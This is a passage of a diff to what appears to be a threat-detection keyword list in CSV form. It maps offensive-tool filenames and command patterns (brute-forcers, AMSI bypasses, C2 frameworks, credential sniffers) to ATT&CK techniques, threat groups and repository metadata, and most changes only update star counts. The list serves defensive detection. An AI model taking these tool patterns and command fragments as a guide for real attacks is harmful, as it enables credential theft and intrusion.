bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordSprayCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*patator ftp_login host=* user=FILE0 0=*.txt *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*patator*","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","3284","776","2023-09-25T06:06:20Z","2014-08-25T00:56:21Z" "*Patch-AMSI.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*patchAmsiOpenSession*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*patchAmsiOpenSession*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*Patch-ETW.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*Pateensy/PaensyLib/*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*--path docToDump.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*path_dll_hijack.h*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*pathhijack.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*PaulSec/twittor*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*PaulSec/twittor*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*PayGen*python3 generate.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","","N/A","","","" "*payload start tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" "*payload.c *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*payload.csproj*","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*payload.sct *","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*payload/encryptor_remote.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*payload/encryptor_remote.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*payload_bootstrap_hint*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*payload_creator.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*payload_creator.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*payload_encryption.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*payload_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*payload_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*payload_local*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*payload_msf.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_msf.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" @@ -14585,9 +14751,9 @@ "*payload_section.hpp*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*payload_spellshell.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_spellshell.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*payload_tidy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*payload_tidy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Payload_Type/freyja/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*PayloadCommsHost*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*PayloadCommsHost*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*--payload-cookie*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*Payload-Download-Cradles*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*PayloadFormat.ASSEMBLY*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" @@ -14610,20 +14776,20 @@ "*PayloadType.HTTP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.REVERSE_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*--payload-url */pwn.html","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"*pcap_linktypes.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*pcap2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pcapfile.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*pcap_linktypes.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*pcap2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pcapfile.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*PcapXray*","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","10","1501","270","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z" "*Pcredz -d *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*Pcredz -f *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*PCredz -f *.pcap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Pcredz -i *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a 